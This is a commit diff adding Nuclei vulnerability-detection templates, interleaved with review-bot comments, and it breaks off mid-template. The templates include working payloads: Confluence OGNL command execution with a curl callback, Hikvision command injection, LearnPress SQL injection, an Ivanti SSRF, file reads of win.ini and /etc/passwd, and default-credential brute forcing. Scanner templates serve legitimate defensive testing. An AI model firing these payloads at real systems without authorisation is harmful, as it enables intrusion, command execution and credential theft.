Adding new templates from Unreleased Templates Repo

patch-1
[PDBot] 2024-03-09 14:23:42 +00:00
parent 6ce3478592
commit faebc1af6a
32 changed files with 1304 additions and 46 deletions

View File

@ -1,29 +1,21 @@
id: CVE-2023-22527
info:
name: Atlassian Confluence - Remote Code Execution
name: Atlassian Confluence Unauthenticted Remote Code Execution
author: iamnooob,rootxharsh,pdresearch
severity: critical
description: |
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassians January Security Bulletin.
description: |-
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassians January Security Bulletin.
reference:
- https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
- https://jira.atlassian.com/browse/CONFSERVER-93833
- https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2023-22527
epss-score: 0.00044
epss-percentile: 0.08115
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: atlassian
product: confluence_data_center
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2023,confluence,rce,ssti
epss-percentile: 0.08185
tags: cve,cve2023,confluence
http:
- raw:
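Review bot: the replacement `name:` line misspells its key word: `Atlassian Confluence Unauthenticted Remote Code Execution` should read `Unauthenticated`, and a hyphen before the vulnerability class (`Atlassian Confluence - Unauthenticated Remote Code Execution`) keeps the `Product - Issue` naming used by every other template in this commit. The shorter header that lands here also trims `tags:` to `cve,cve2023,confluence`, dropping `rce` and `ssti`, and the `cpe`, `max-request`, `vendor`, `product` and `shodan-query` fields present in the other variant of this hunk are gone; those fields drive tag filtering and asset matching, so keep them unless the removal is deliberate.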
@ -31,19 +23,18 @@ http:
POST /template/aui/text-inline.vm HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Empty{name='
- type: dsl
dsl:
- x_vuln_check != "" # check for custom header key exists
- contains(to_lower(body), 'empty{name=')
condition: and
extractors:
- type: dsl
dsl:
- x_vuln_check # prints the output of whoami
# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950
- "contains(interactsh_protocol, 'dns')"
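Review bot: `Content-Length: 335` is hard-coded in the raw request while the `label=...` body changes in this hunk (the two body variants differ in length and the new one embeds `{{interactsh-url}}`), so the declared length will not match what is sent; drop the header and let the engine compute it. Detection now hinges on the out-of-band `contains(interactsh_protocol, 'dns')` condition, and `matchers-condition: and` ties it to the in-band `Empty{name=` body marker; keep that pairing so a callback without the response marker is not reported on its own. The `# digest:` trailer visible in this hunk is a signature over the template body, so it cannot be carried over unchanged once the request and matchers differ; it has to be regenerated by the signing step or signature verification fails.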

View File

@ -0,0 +1,37 @@
id: CVE-2023-6114
info:
name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
author: DhiyaneshDk
severity: high
description: |
The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
reference:
- https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
- https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
- https://nvd.nist.gov/vuln/detail/CVE-2023-6114
- https://wpscan.com/plugin/duplicator/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6114
cwe-id: CWE-552
epss-score: 0.00145
epss-percentile: 0.50326
cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
- "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '/tmp') && contains(body, '<title>Index of')"
condition: and
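Review bot: `remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.` runs two clauses together without a space; `Fixed in Duplicator 1.5.7.1 and Duplicator Pro 4.5.14.2.` reads cleanly. The first `reference:` entry is a Google Drive share link, which is neither stable nor attributable; the WPScan and NVD entries already listed cover the issue, so drop it or replace it with the advisory it points at. The check detects an exposed `backups-dup-lite/tmp` directory listing (`cwe-id: CWE-552`), so `exposure` describes it better than the `lfi` tag, and a `metadata:` block with `max-request: 2` and `vendor`/`product` would match the other CVE templates in this commit.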

View File

@ -0,0 +1,33 @@
id: CVE-2023-6567
info:
name: LearnPress <= 4.2.5.7 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in version 4.2.5.8
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
- https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6567
classification:
cve-id: CVE-2023-6567
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains_all(header, "lp_session_guest=", "application/json")'
- 'contains_all(body, "status\":\"success", "No courses were found")'
condition: and
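Review bot: the author handle `iamnoooob` here differs from `iamnooob` on the CVE-2023-22527 template in the same commit; one of the two is misspelled and they should agree. `classification:` carries only `cve-id`, although the description names an unauthenticated SQL injection; add `cwe-id: CWE-89` and the CVSS vector as the other CVE templates do. In the `path:` entry, `archive-course?&order_by=` has a stray `&` directly after `?`; most servers ignore it, but it should go. The `duration>=6` condition is wall-clock timing, and the `and` with the `lp_session_guest=` header check and the `status\":\"success` body check is what keeps a slow but unaffected host from matching; keep all three conditions together.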

View File

@ -1,24 +1,20 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
name: Hikvision IP ping.php - Command Execution
author: DhiyaneshDk
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
epss-percentile: 0.33389
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
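Review bot: the single-line `description:` in this hunk is advisory boilerplate (`It has been declared as critical.`, `The exploit has been disclosed to the public and may be used.`, `VDB-248254 is the identifier assigned to this vulnerability.`) rather than a description of the check; the two-sentence variant above it names the affected version, the `jsondata[ip]` parameter and the `/php/ping.php` file and is the better text. The fix version it mentions (`Upgrading to version 4.1.0`) belongs in a `remediation:` field, as the Duplicator and LearnPress templates in this commit do. `https://github.com/Marco-zcl/POC` and `https://github.com/d4n-sec/d4n-sec.github.io` are repository roots rather than pages about this CVE; link the specific file or rely on the VulDB entries already listed.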
@ -26,31 +22,35 @@ info:
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
tags: cve,cve2023,hikvision,rce
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
- method: POST
path:
- "{{BaseURL}}/php/ping.php"
body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
headers:
Content-Type: "application/x-www-form-urlencoded"
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
payloads:
command:
- 'id'
- 'cmd /c ipconfig'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: regex
part: body
regex:
- "Windows IP"
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
condition: or
- type: word
part: body
part: header
words:
- "TTL="
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
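Review bot: the `method: POST` variant sends both `payloads:` values (`id` and `cmd /c ipconfig`) to every target and has no `stop-at-first-match: true`, so a host that already matched on the first command still receives the second; add `stop-at-first-match: true` and `max-request: 2` under `metadata`. Executing a command on the target is an intrusive check, so `tags:` should carry `intrusive`, as the idocview upload template in this commit intends. The `part: header` word matcher on `text/html` adds little evidence, since any PHP page returns it; the regex on command output plus the status check is the meaningful condition. As with the Confluence template, the `# digest:` trailer must be regenerated once the request block changes.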

View File

@ -0,0 +1,45 @@
id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
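Review bot: `cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*` pins the CPE to version 9.0, while the description covers Connect Secure 9.x and 22.x, Policy Secure 9.x and 22.x, and Neurons for ZTA; use a wildcard version so the CPE agrees with the stated scope. `metadata:` lacks `max-request: 1`, which the other single-request templates in this commit set. The body matcher (`/dana-na/`, `WriteCSS`) is a product fingerprint rather than evidence of the SSRF, and `matchers-condition: and` correctly makes the `interactsh_protocol` DNS callback the deciding condition; the inline `# Confirms the DNS Interaction` comment is the kind of note the other matchers in this commit could use too.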

View File

@ -0,0 +1,61 @@
id: ispconfig-default-login
info:
name: ISPConfig - Default Password
author: pussycat0x
severity: high
description: |
ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
metadata:
verified: true
shodan-query: http.title:"ispconfig"
tags: default-login,ispconfig
http:
- raw:
- |
GET /lgoin HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Connection: close
Referer: {{RootURL}}/login/
username={{username}}&password={{password}}&s_mod=login&s_pg=index
- |
GET /sites/web_vhost_domain_list.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/index.php
attack: pitchfork
payloads:
username:
- 'admin'
- 'guest'
- 'root'
password:
- 'admin'
- 'password'
- 'toor'
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Tools
- Websites
condition: and
- type: status
status:
- 200
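Review bot: the first raw request is `GET /lgoin HTTP/1.1`, a transposition of `/login`; as written it fetches a non-existent path, so whatever it is meant to establish before the `POST /login/index.php` (a session cookie, presumably) never happens. `description:` (`ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.`) says nothing about the check; state that it attempts the `admin`/`admin`, `guest`/`password` and `root`/`toor` pairs and looks for `Tools` and `Websites` in the third response (`part: body_3`). With three pitchfork pairs and three requests each, `metadata:` should carry `max-request: 9`.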

View File

@ -0,0 +1,33 @@
id: ares-rat-c2
info:
name: Area Rat C2 - Detect
author: pussycat0x
severity: info
description: |
Ares is a Python Remote Access Tool.
reference:
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
shodan-query: product:'Ares RAT C2'
tags: c2,ir,osint,ares,panel,rat
http:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Ares</title>'
- 'Passphrase:'
condition: and
- type: status
status:
- 200
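Review bot: `name: Area Rat C2 - Detect` misspells the product; the `id`, `tags` and `shodan-query` all say `Ares`, so the name should read `Ares RAT C2 - Detect`. `description:` (`Ares is a Python Remote Access Tool.`) is a single clause and the only reference is the C2-Tracker script that catalogues the fingerprint; add the project's own repository as a reference and say what the check looks for, namely a `<title>Ares</title>` login page with a `Passphrase:` prompt.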

View File

@ -0,0 +1,32 @@
id: caldera-c2
info:
name: Caldera C2 - Detect
author: pussycat0x
severity: info
description: |
MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
reference:
- https://github.com/mitre/caldera
- https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
metadata:
verified: true
max-request: 1
fofa-query: http.favicon.hash:-636718605
tags: c2,ir,osint,caldera,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Login | CALDERA</title>'
- type: status
status:
- 200
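Review bot: `fofa-query: http.favicon.hash:-636718605` is Shodan favicon syntax under a FOFA key; the other templates in this commit write FOFA icon queries as `icon_hash="..."` (the Hikvision and Supershell templates) and Shodan queries under `shodan-query:`. Either rename the key to `shodan-query:` or rewrite the value in FOFA syntax, depending on which engine the hash was taken from. The trademark symbol in `MITRE Caldera™` is unusual for a template description; plain `MITRE Caldera` is fine.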

View File

@ -0,0 +1,31 @@
id: hack5-cloud-c2
info:
name: Hack5 Cloud C2 - Detect
author: pussycat0x
severity: info
description: |
Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
reference:
- https://twitter.com/fofabot/status/1742737671037091854
metadata:
verified: true
max-request: 1
fofa-query: app="Hak5-C2"
tags: c2,ir,osint,hack5c2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Hak5 Cloud C²</title>'
- type: status
status:
- 200
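Review bot: `id: hack5-cloud-c2`, `name: Hack5 Cloud C2 - Detect` and the `hack5c2` tag spell the vendor `Hack5`, while the description, `fofa-query: app="Hak5-C2"` and the `<title>Hak5 Cloud C²</title>` matcher all use `Hak5`, the vendor's actual name; align id, name and tag to `hak5` so searches by vendor find the template. The only reference is a tweet (`https://twitter.com/fofabot/...`); the vendor's product page is a more durable citation.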

View File

@ -0,0 +1,32 @@
id: pupyc2
info:
name: PupyC2 - Detect
author: pussycat0x
severity: info
description: |
Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
reference:
- https://twitter.com/TLP_R3D/status/1654038602282565632
- https://github.com/n1nj4sec/pupy
metadata:
verified: true
max-request: 1
shodan-query: aa3939fc357723135870d5036b12a67097b03309
tags: c2,ir,osint,pupyc2,panel
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
- type: status
status:
- 200
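Review bot: `shodan-query: aa3939fc357723135870d5036b12a67097b03309` is a bare value with no field qualifier, unlike every other `shodan-query` in this commit (`port:...`, `http.title:...`, `http.component:...`); qualify it with the field the hash was taken from so the query is reproducible. The header matcher `'Etag: "aa3939fc..."'` is case-sensitive on the header name, but HTTP header names are not; a server that emits the canonical `ETag:` spelling is missed. Match on the quoted hash value alone, or set `case-insensitive: true` on the word matcher.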

View File

@ -0,0 +1,33 @@
id: supershell-c2
info:
name: Supershell C2 - Detect
author: pussycat0x
severity: info
description: |
Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel, a fully interactive shell can be obtained, and it supports multi-platform architecture Payload.
reference:
- https://twitter.com/S4nsLimit3/status/1693619836339859497
- https://github.com/tdragon6/Supershell/blob/main/README_EN.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-1010228102"
tags: c2,ir,osint,supershell,panel
http:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Supershell - 登录</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: esafenet-mysql-fileread
info:
name: Esafenet CDG mysql - File Read
author: DhiyaneshDk
severity: high
description: |
CDGServer3 Unauthorized File Download vulnerability is detected.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统"
tags: esafenet,lfi,mysql
http:
- method: GET
path:
- "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "varchar"
- "create table"
condition: and
- type: word
part: header
words:
- "application/x-sql"
- type: status
status:
- 200
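Review bot: `description: CDGServer3 Unauthorized File Download vulnerability is detected.` describes the outcome rather than the check; the request fetches a fixed installation file (`/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql`) and matches on `create table`, `varchar` and an `application/x-sql` content type, so this is an exposed-file check and `exposure` fits better than `lfi` in `tags:`. No `reference:` is given; add the advisory or write-up the path was taken from.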

View File

@ -0,0 +1,30 @@
id: idocview-2word-fileupload
info:
name: IDoc View /html/2word - Arbitrary File Upload
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,rce,instrusive,file-upload
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/html/2word?url={{file}}"
matchers-condition: and
matchers:
- type: word
part: response
words:
- "{{md5(file)}}.docx"
- type: status
status:
- 200
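Review bot: `tags: idoc,rce,instrusive,file-upload` misspells `intrusive`, which matters because the tag is what `-exclude-tags intrusive` filters on; a misspelled tag silently escapes that exclusion. The template has no `description:` or `reference:`; the `/html/2word?url=` endpoint and the `{{md5(file)}}.docx` response marker should be explained, and `part: response` can be narrowed to `part: body`, where the generated filename appears.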

View File

@ -0,0 +1,37 @@
id: idocview-lfi
info:
name: IDoc View - Arbitrary File Read
author: DhiyaneshDK
severity: high
metadata:
verified: true
max-request: 1
fofa-query: title=="在线文档预览 - I Doc View"
tags: idoc,lfi,file-read
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, 'application/json')
- contains_all(body, "ext", "srcUrl", "success", "md5")
condition: and
extractors:
- type: regex
part: body
internal: true
name: filepath
group: 1
regex:
- '"srcUrl":"\/([a-z/0-9_.]+)"'
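Review bot: the `extractors:` entry is `internal: true` with `name: filepath`, but this template issues a single request, so nothing consumes the extracted `srcUrl` path; either drop `internal: true` so the path is reported with the finding, or remove the extractor. The matcher confirms only that the upload endpoint answered JSON containing `ext`, `srcUrl`, `success` and `md5`, not that the referenced file was read, and the hard-coded `file:///C:/windows/win.ini` makes the check Windows-only; both limitations belong in a `description:`, which the template lacks along with `reference:`.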

View File

@ -0,0 +1,36 @@
id: office365-indexs-fileread
info:
name: OfficeWeb365 Indexs Interface - Arbitary File Read
author: DhiyaneshDK
severity: high
description: |
There is any file reading in the officeWeb365 Indexs interface.
reference:
- https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
shodan-query: "OfficeWeb365"
tags: officeweb365,lfi
http:
- method: GET
path:
- "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: word
part: body
words:
- "image/png"
- type: status
status:
- 200
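Review bot: the second word matcher looks for `image/png` with `part: body`, but that string is a `Content-Type` value and, unless the body itself echoes the MIME type, belongs in `part: header`; with `matchers-condition: and` the template otherwise requires the MIME type to appear in a body that the first matcher expects to be `win.ini` content (`for 16-bit app support`), so it may never match. `name:` misspells `Arbitrary` (`Arbitary`), and `description: There is any file reading in the officeWeb365 Indexs interface.` should read `The OfficeWeb365 Indexs interface allows arbitrary file read.` The opaque `imgs=DJwkiEm6...` value is undocumented; a comment pointing to where in the reference it is derived would help maintainers.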

View File

@ -0,0 +1,51 @@
id: mysql-load-file
info:
name: MySQL LOAD_FILE - Enable
author: pussycat0x
severity: high
description: |
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,audit,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: SELECT LOAD_FILE('/etc/passwd')
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- success == true
- type: word
words:
- "root:x:"
extractors:
- type: json
part: response
json:
- .Rows[]
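Review bot: `reference:` points at `mysql-databases.html`, the nmap script for listing databases, which does not cover `LOAD_FILE`; cite documentation on `LOAD_FILE`, the `FILE` privilege and the `secure_file_priv` system variable that restricts it, and name that variable in the description, since it is the mitigation a reader of this finding needs. `potentially dangerous if not used carefully` is generic; say that the check authenticates with the wordlist pairs and reports when the server returns `/etc/passwd` content (`root:x:`), which means the account holds `FILE` and `secure_file_priv` is not restricting reads. `metadata:` lacks `max-request`, and the `audit,fuzz` tags omit `default-login`, which `mysql-default-login` uses for the same wordlist pairing.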

View File

@ -0,0 +1,40 @@
id: pop3-capabilities-enum
info:
name: POP3 Capabilities - Enumeration
author: pussycat0x
severity: info
description: |
POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
reference:
- https://nmap.org/nsedoc/scripts/pop3-capabilities.html
metadata:
max-request: 1
shodan-query: "port:110"
verified: true
tags: js,network,pop3,enum
javascript:
- code: |
let data = "CAPA\r\n"
let c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let result = conn.RecvString();
let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
Export(cleanedData)
args:
Host: "{{Host}}"
Port: 110
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: dsl
name:
dsl:
- response
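Review bot: the cleanup regex `/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g` hard-codes Dovecot's greeting, so any other POP3 server leaves its banner and the `+OK` prefix in the exported string; strip everything up to the first `\r\n` generically instead of matching one vendor's text. The extractor has an empty `name:`; give it a name or remove the key. `Port: 110` is unquoted while every other template in this commit quotes the port (`Port: "445"`); keep the style consistent. `description:` should also note that `CAPA` is optional in RFC 2449, so servers that do not implement it yield nothing.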

View File

@ -0,0 +1,29 @@
id: rsync-version
info:
name: Rsync Version - Detect
author: DhiyaneshDK
severity: info
description: |
Identify the Version of the Rsync Protocol
metadata:
verified: true
max-request: 1
shodan-query: port:"873"
tags: js,network,rsync,enum
javascript:
- code: |
let m = require('nuclei/rsync');
let c = m.RsyncClient();
let response = c.IsRsync(Host,Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "873"
extractors:
- type: json
json:
- .Banner

View File

@ -0,0 +1,46 @@
id: smb-default-creds
info:
name: SMB Default Credential - Brutforcing
author: pussycat0x
severity: high
description: |
Attempts to guess username/password combinations over SMB.
reference:
- https://nmap.org/nsedoc/scripts/smb-brute.html
metadata:
verified: true
shodan-query: "port:445"
tags: js,network,smb,enum,default
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListShares(Host, Port, User, Pass);
response;
args:
Host: "{{Host}}"
Port: "445"
User: "{{usernames}}"
Pass: "{{passwords}}"
attack: clusterbomb
payloads:
usernames:
- 'admin'
- 'administrator'
- 'guest'
passwords:
- 'admin'
- 'password'
- 'guest'
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'response != "[]"'
- 'success == true'
condition: and
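Review bot: `name: SMB Default Credential - Brutforcing` misspells `Bruteforcing`. The `clusterbomb` attack sends all nine username/password combinations to each host until one succeeds; against domain-joined targets that can trip account-lockout policies, so the description should say so and `metadata:` should carry `max-request: 9`. The success condition `response != "[]"` treats a login that succeeds but returns no shares (an empty `ListShares` result) as a failure; either check the authentication outcome separately, if the client exposes it, or document this blind spot in a comment so the under-reporting is known.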

View File

@ -0,0 +1,41 @@
id: smb-enum-domains
info:
name: SMB - Enum Domains
author: DhiyaneshDK
severity: info
description: |
